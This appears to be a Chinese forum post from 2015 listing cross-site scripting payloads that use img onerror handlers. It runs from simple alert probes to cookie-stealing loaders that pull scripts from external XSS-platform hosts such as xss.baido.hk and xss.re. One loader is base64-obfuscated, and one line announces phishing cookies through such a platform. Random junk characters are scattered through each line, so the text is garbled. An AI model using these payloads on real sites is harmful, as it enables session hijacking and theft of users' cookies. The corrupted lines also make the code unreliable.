<img src='non-exist.jpg'onerror="alert('xss')">( n; d \/ V# ~9 j( W/ s" s1 Q" @
<img src=# onerror=alert(123)>
) R; M- \/ O- r1 t+ @+ [& J Q3 \% g<img src=# onerror=alert(document.cookie)>
; P0 j1 e! z% P; y1 s, R$ M下面是利用平台钓cookie的
2 `; H1 h- I5 v. W <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>: E+ ?$ z, M; l7 V0 h. T# W# ?
2 u* q$ C# O* l3 K \) p! o, A7 c8 Z
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>: h6 e6 K, p9 o) B O
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
- h8 H2 d- t/ A3 O# |9 J9 Y“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>( M5 d/ }& F/ K) V
<img src=1 onerror=jQuery.getScript("//xss.re/974")> 7 }4 Y, Y8 K" U O& f
<img src="#">
/ L# K8 Z2 k& g M' a/ ^- P" G* q<img src="#">
( n" |* ~* D( o: }<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>" v) a: V+ h9 w( j0 d7 u
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">. D! _1 u0 C, b2 F& H, ]
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
( a; b# x- h; a. x' v$ I5 D* D" u<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>! F. {5 Y9 q/ X7 E$ s: G
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>! l! L+ p- m+ m
<img src=x width="0" height="0"></img>
- i/ R8 i$ _/ h. H' i% L<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>1 {; T9 f! N0 N& n2 Q$ Y S1 t- \7 ?2 V
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';> K1 m" { c4 g" N- `$ C) w- u
|
发表于 2015-10-18 14:33:54
收藏
支持
反对